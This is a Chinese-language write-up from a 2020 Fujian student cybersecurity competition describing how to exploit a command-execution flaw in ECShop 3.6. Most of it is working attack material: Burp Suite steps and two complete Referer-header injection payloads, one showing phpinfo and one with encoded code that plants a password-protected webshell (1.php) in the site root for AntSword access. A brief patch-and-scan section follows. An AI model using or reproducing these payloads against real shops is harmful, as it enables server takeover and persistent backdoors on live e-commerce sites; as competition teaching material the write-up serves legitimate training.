漏洞利用
1、 访问目标系统,是个ECShop商城网站。
2、 浏览界面发现, ecshop 版本为 3.6,ecshop3.6 存在命令执行漏洞
3、 进行漏洞利用,启动 burpsuite。
4、 注册账户,访问 user.php 并传参数 act=login 同时抓包
5、 添加 Referer 头信息并传入 poc
显示 Phpinfo 信息如下
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:107:”*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e66
6f0928293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1′
UNION/*”;}45ea207d7a2b68c49582d2d22adf953a
Wehshell 如下(会在网站根目录下生成一个 1.php,密码:1337):
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:289:”*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274
286261736536345f6465636f646528275a6d6c735a563977645852665932397564475
67564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58
314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10
— -“;s:2:”id”;s:11:”-1′ UNION/*”;}
6、 执行如下 poc 可直接上传一个 webshell
7、 使用蚁剑进行 webshell 连接
竞赛详情了解:http://www.si.net.cn/
漏洞防护
1、对漏洞进行修复,进入网站服务器内,修改/includes/lib_insert.php
2、使用 hmwebshell 工具扫描木马,进行删除
活动简介
网络空间的竞争,归根到底是人才的竞争。9月12日至13日,由省委网信办、省教育厅、省公安厅联合主办的2020年国家网络安全宣传周福建省网络空间安全技能竞赛高校学生组暨“黑盾杯”赛项成功举办。
竞赛详情了解:http://www.si.net.cn/